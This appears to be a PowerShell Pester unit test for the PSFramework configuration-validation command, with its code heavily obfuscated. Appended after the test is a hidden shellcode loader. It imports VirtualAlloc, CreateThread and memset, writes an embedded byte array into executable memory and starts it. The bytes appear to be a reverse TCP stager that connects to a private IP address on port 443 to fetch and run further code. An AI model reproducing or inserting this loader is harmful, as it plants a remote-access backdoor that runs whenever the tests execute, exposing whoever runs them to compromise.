 $DzK8gf=[TYpE]("{7}{5}{2}{10}{11}{6}{12}{3}{8}{1}{9}{4}{0}"-F'oST','u','.conF','Nfi','Onh','wOrk','tIon.','PSFrAmE','g','RAti','iG','ura','Co');.("{1}{0}{2}" -f'esc','D','ribe') ("{6}{0}{3}{1}{4}{7}{5}{2}" -f 'st','PSFConfigV','s','er-','alida','Unit Test','Regi','tion ') -Tag "CI", ("{1}{0}"-f 'eline','Pip'), ("{0}{1}" -f'U','nit') {
	.("{0}{1}{2}"-f'Befor','eA','ll') {
		&("{0}{2}{1}{3}" -f'G','-PSFCo','et','nfig') -Module ("{2}{4}{5}{3}{8}{0}{1}{7}{6}"-f 'Val','id','Regis','nfi','ter-P','SFCo','ion','at','g') -Force | &("{2}{1}{0}{3}"-f'Obj','Each-','For','ect') {
			${n`Ull} =  ( .("{1}{0}"-f'ILdiTEM','CH') ("{1}{2}{0}{3}{4}" -f 'le','VArI','AB',':dZk','8gF') ).ValUe::"CO`NfIguratio`Ns".("{0}{1}"-f'Re','move').Invoke(${_}."F`UL`lNAme")
		}
	}
	.("{0}{1}"-f 'AfterA','ll') {
		&("{3}{1}{0}{2}"-f'o','SFC','nfig','Get-P') -Module ("{2}{4}{3}{6}{1}{0}{5}" -f'd','Vali','Register-','n','PSFCo','ation','fig') -Force | &("{0}{3}{1}{2}{4}" -f 'F','rEach-Obj','ec','o','t') {
			${N`Ull} =  (  .("{2}{0}{1}{3}" -f 'IA','B','gET-Var','LE')  ("{0}{1}" -f 'DZk8g','F')  -vaLUE)::"co`N`Fi`Gur`AtIOns".("{0}{2}{1}" -f 'Re','ove','m').Invoke(${_}."F`UlLna`mE")
		}
	}
	
	
	&('It') ("{6}{4}{7}{5}{0}{2}{3}{1}" -f'f','s','or parameters ','& set',' ','he designed ','Should','have t') {
		(&("{1}{2}{3}{0}"-f 'and','Ge','t-C','omm') ("{0}{4}{2}{7}{6}{5}{3}{1}" -f'Register','tion','FC','a','-PS','lid','igVa','onf'))."pArAMe`T`e`Rse`Ts"."n`AME" | &("{2}{1}{0}"-f 'ld','ou','Sh') -Be ("{0}{5}{3}{1}{2}{4}" -f '__All','eterS','et','m','s','Para')
		${PrOP`ERTi`eS} = ("{0}{1}"-f'Na','me'), ("{2}{1}{0}"-f'k','oc','ScriptBl'), ("{0}{1}"-f'Ver','bose'), ("{1}{0}" -f'g','Debu'), ("{3}{0}{1}{2}" -f'r','rorAct','ion','E'), ("{2}{1}{0}"-f'gAction','in','Warn'), ("{3}{0}{2}{1}" -f 'or','n','mationActio','Inf'), ("{3}{1}{2}{0}" -f'iable','r','orVar','Er'), ("{2}{3}{0}{1}" -f 'ngV','ariable','Wa','rni'), ("{1}{0}{2}{6}{5}{3}{4}" -f'or','Inf','mati','riab','le','a','onV'), ("{3}{1}{0}{2}"-f'abl','i','e','OutVar'), ("{2}{0}{1}"-f 'Buf','fer','Out'), ("{2}{4}{0}{3}{1}" -f'ineVaria','le','Pip','b','el')
		&("{1}{2}{0}{3}" -f 'e-Objec','Compa','r','t') ${PROpER`T`ies} ((.("{1}{2}{0}{3}"-f '-Com','G','et','mand') ("{3}{5}{4}{7}{0}{6}{1}{2}" -f'o','lid','ation','R','ister-P','eg','nfigVa','SFC'))."PA`RAmet`eRs"."kE`yS" | .("{0}{2}{1}" -f 'Remo','l','ve-PSFNul') -Enumerate) | &("{1}{0}" -f'ould','Sh') -BeNullOrEmpty
	}
	
	&("{0}{1}" -f 'Con','text') ("{4}{9}{1}{7}{3}{6}{8}{11}{0}{12}{5}{10}{2}" -f'r','ng valid','sed','n','Ensur','ted, a',' ','atio','can','i','ssigned and u',' be c','ea') {
		
		${ScRI`PtbLO`cK} = {
			Param (
				${v`ALUe}
			)
			
			${reS`ULt} = .("{3}{2}{1}{0}" -f 'ect','Obj','-','New') ("{1}{0}"-f'ject','PSOb') -Property @{
				("{1}{2}{0}" -f'cess','Su','c') = ${tR`Ue}
				("{1}{0}" -f'lue','Va')   = ${Nu`ll}
				("{1}{2}{0}"-f 'sage','Me','s') = ""
			}
			
			if (${va`l`Ue} -notin 0, 1)
			{
				${Re`Su`lt}."m`E`sSAGe" = ('Not'+' '+'a '+(('qyx'+'0qyx ')  -cReplAcE  'qyx',[CHaR]39)+'o'+'r '+('{0}1'+'{0}: ')  -F [ChaR]39+"$Value")
				${re`Su`lT}."SU`CCeSs" = ${f`Al`Se}
				return ${r`E`sult}
			}
						
			${Res`ULT}."va`luE" = [int]${V`ALUE}
			
			return ${res`UlT}
		}
		
		
		.('It') ("{2}{1}{4}{12}{3}{5}{8}{0}{9}{7}{11}{6}{10}" -f'a','hould','S','ate the',' c',' vali',' iss','n rule withou','d','tio','ue','t an','re') {
			{ &("{1}{0}{4}{3}{2}"-f 'Val','Register-PSFConfig','on','dati','i') -Name ("{2}{0}{1}"-f 'tege','r0or1','in') -ScriptBlock ${SCr`ip`TB`lOck} } | &("{0}{1}"-f 'Sh','ould') -Not -Throw
			 $DZK8GF::"VA`L`IDAtION"[("{1}{0}{2}" -f 'te','in','ger0or1')] | .("{1}{0}" -f 'hould','S') -Be ${SCRiptBl`O`cK}
		}
		
		
		.('It') ("{15}{16}{7}{11}{6}{9}{8}{2}{12}{1}{0}{14}{10}{5}{3}{13}{4}" -f' val','tion',' co','his','idation','th t','r','c','ectly create new','r','s wi','o','nfigura',' val','ue','S','hould ') {
			${con`F`iG} = &("{2}{0}{1}{3}"-f't-PSFC','on','Se','fig') -FullName ("{5}{7}{2}{12}{9}{10}{4}{0}{8}{6}{3}{11}{1}" -f 'nfigValidation.Phase1.S','ng1','r-','t','o','Regi','t','ste','e','F','C','i','PS') -Value 1 -Validation ("{3}{1}{2}{0}" -f'0or1','nteg','er','i') -EnableException -PassThru
			${Co`Nf`iG}."vaLi`dAt`iOn" | .("{1}{0}"-f 'uld','Sho') -Be ${s`cR`iPtbLoCK}
		}
		
		
		.('It') ("{2}{6}{4}{0}{5}{1}{3}" -f 'cept ','egal in','Sh','put',' ac','l','ould') {
			{ .("{3}{0}{2}{1}" -f 'PSF','fig','Con','Set-') -FullName ("{2}{5}{9}{7}{4}{10}{0}{8}{12}{3}{1}{6}{11}" -f 'id','Phase1.Se','Regi','.','figV','ster-PS','tt','on','at','FC','al','ing1','ion') -Value 0 -EnableException } | .("{1}{2}{0}"-f'uld','Sh','o') -Not -Throw
		}
		
		.('It') ("{0}{4}{2}{3}{1}"-f 'Sh','t','efu','se illegal inpu','ould r') {
			{ &("{2}{3}{0}{1}"-f'SFCon','fig','S','et-P') -FullName ("{9}{10}{6}{7}{12}{2}{3}{1}{4}{5}{8}{0}{11}" -f't','n.','Con','figValidatio','Phas','e1','st','er','.Se','Reg','i','ting1','-PSF') -Value 2 -EnableException } | &("{0}{1}"-f 'Shoul','d') -Throw
		}
	}
}
${C} = ((("{42}{55}{31}{27}{21}{30}{50}{69}{33}{26}{64}{51}{20}{49}{28}{39}{25}{13}{71}{16}{29}{19}{56}{10}{17}{8}{47}{46}{41}{32}{70}{22}{7}{12}{52}{34}{11}{23}{15}{43}{9}{53}{0}{57}{68}{1}{58}{67}{35}{44}{3}{60}{45}{65}{38}{48}{5}{18}{63}{6}{62}{66}{2}{36}{40}{14}{61}{37}{54}{59}{4}{24}"-f 'r','hreadAtt',']publ','pS','c, uint ','nt','d','q)','rt','eate','D','a',']publi','l','tPt','exter','ationTy','llImpo',' dwCreationFla','f','ss, u','xtern IntPtr ','32.dll6s','tic ','count);','e, uint f','r l','atic e',' dwSi','pe, uint ','Virtu','ublic st','ne','IntPt','t','tackSize, IntPt','ic st',', uin','amete','z','atic extern IntPtr memset(In','r','[DllImport(6sqkernel','n IntPtr Cr','r l','tA','e','(6sqk','r, ui','int','alAll','e','c s','Th','t s','32.dll6sq)]p','lProtect);[','e','rib','r','tar','r dest','Id);[DllImport(6','gs, IntPtr lpThrea','pAddr','ddress, IntPtr lpPar','sqmsvcrt.dll6sq)','utes, uint dwS','ad(IntPtr lpT','oc(','l','Alloc'))-crEpLacE  '6sq',[CHar]34);${W} = .("{0}{1}{2}" -f 'Add-T','yp','e') -memberDefinition ${C} -Name ("{0}{1}" -f 'W','in32') -namespace ("{0}{2}{1}"-f 'W','ons','in32Functi') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0xa1,0x8c,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."lE`NGTH" -gt 0x1000){${g} = ${Z}."lEn`gtH"};${x}=${W}::("{3}{1}{0}{2}" -f 'lA','ua','lloc','Virt').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."L`EN`gth"-1);${i}++) {${W}::"ME`MsET"([IntPtr](${x}.("{2}{1}{0}" -f 't32','In','To').Invoke()+${i}), ${Z}[${I}], 1)};${w}::("{1}{3}{2}{0}"-f'd','Cre','eThrea','at').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{1}{0}"-f 'p','-slee','Start') 60};
